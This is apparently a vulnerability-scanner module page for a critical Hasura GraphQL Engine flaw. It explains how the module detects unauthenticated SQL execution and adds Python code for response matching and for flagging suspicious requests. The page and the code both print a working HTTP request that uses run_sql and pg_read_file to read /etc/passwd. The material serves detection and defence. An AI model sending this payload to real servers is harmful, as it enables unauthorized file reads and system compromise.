Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Hasura GraphQL Engine - Remote Code Execution" module is designed to detect a vulnerability in the Hasura GraphQL Engine software. This vulnerability allows remote unauthenticated users to execute arbitrary SQL statements through the "/v2/query" endpoint, leading to remote code execution. The severity of this vulnerability is classified as critical, with a CVSS score of 10. The module was authored by Udyz.
If exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary SQL statements, potentially gaining unauthorized access to sensitive data, modifying the database, or even compromising the entire system. It is crucial to address this vulnerability promptly to prevent any potential damage.
The module sends an HTTP POST request to the "/v2/query" endpoint of the Hasura GraphQL Engine. The request payload is a "bulk" query containing a single "run_sql" action whose SQL statement attempts to read the contents of the "/etc/passwd" file via pg_read_file. The module then applies a matching condition to the response: it checks whether the response body matches the regular expression "root:.*:0:0:" (the pattern of the root entry in a passwd file). If this condition is met, the SQL statement was executed without authentication and the vulnerability is present.
Example HTTP request:
POST /v2/query HTTP/1.1
Host: {%Hostname%}
Content-Type: application/json

{
  "type": "bulk",
  "source": "default",
  "args": [
    {
      "type": "run_sql",
      "args": {
        "source": "default",
        "sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
        "cascade": false,
        "read_only": false
      }
    }
  ]
}
The module's matching condition checks whether the response body matches the regular expression "root:.*:0:0:" rather than a literal string; a typical match is "root:x:0:0:" from the first line of /etc/passwd. If this condition is met, the SQL statement successfully read the contents of the "/etc/passwd" file, confirming the presence of the vulnerability.
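The following is an added example, not part of the Vidoc module or Hasura's own code, showing both sides of the logic described above: the module's matching condition implemented as a regular-expression check over a response body, and a defender-side check that flags the same request pattern (a "run_sql" action arriving without the admin secret) in traffic or access-log review. The sample response and request bodies are constructed; the header name x-hasura-admin-secret is Hasura's documented admin header, and treating its absence as "unauthenticated" is an assumption about the deployment.

```python
import json
import re

# The module's matching condition is a regular expression, not a literal string.
# It matches a passwd root entry such as "root:x:0:0:root:/root:/bin/bash".
PASSWD_ROOT_RE = re.compile(r"root:.*:0:0:")

# Constructed sample of what a run_sql result carrying file contents looks like
# (not captured from a real system).
VULNERABLE_RESPONSE = json.dumps({
    "result_type": "TuplesOk",
    "result": [
        ["pg_read_file"],
        ["root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\n"],
    ],
})

# Constructed sample of a hardened engine rejecting the request.
SAFE_RESPONSE = json.dumps({
    "error": "admin secret required",
    "code": "access-denied",
})

# The request body from the module, reused here as the constructed sample input
# for the request-side check.
RUN_SQL_REQUEST_BODY = json.dumps({
    "type": "bulk",
    "source": "default",
    "args": [{
        "type": "run_sql",
        "args": {
            "source": "default",
            "sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
            "cascade": False,
            "read_only": False,
        },
    }],
})


def response_indicates_file_read(body: str) -> bool:
    """Apply the module's matching condition to an HTTP response body.

    A match means the SQL statement executed and returned passwd contents,
    which is how the module decides the endpoint is exposed.
    """
    return PASSWD_ROOT_RE.search(body) is not None


def _contains_run_sql(node) -> bool:
    """Walk a (possibly nested bulk) query payload looking for a run_sql action."""
    if isinstance(node, dict):
        if node.get("type") == "run_sql":
            return True
        return any(_contains_run_sql(v) for v in node.values())
    if isinstance(node, list):
        return any(_contains_run_sql(item) for item in node)
    return False


def request_is_unauthenticated_run_sql(headers: dict, body: str) -> bool:
    """Defender-side check: flag a run_sql request that carries no admin secret.

    Assumption: the deployment authenticates the query API with the
    x-hasura-admin-secret header, so its absence marks the request as
    unauthenticated. Header names are compared case-insensitively.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    if "x-hasura-admin-secret" in lowered:
        return False
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return False
    return _contains_run_sql(payload)


if __name__ == "__main__":
    print("vulnerable response matches:", response_indicates_file_read(VULNERABLE_RESPONSE))
    print("safe response matches:", response_indicates_file_read(SAFE_RESPONSE))
    print("unauthenticated run_sql flagged:",
          request_is_unauthenticated_run_sql({"Content-Type": "application/json"},
                                             RUN_SQL_REQUEST_BODY))
```

The response check mirrors the module exactly; the request check is the mitigation-side counterpart, suitable for a WAF rule or a pass over request logs where bodies are retained. Because `.` does not cross newlines in Python's default mode, the pattern matches within the single root line, as the module intends.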
For more information, refer to the official documentation.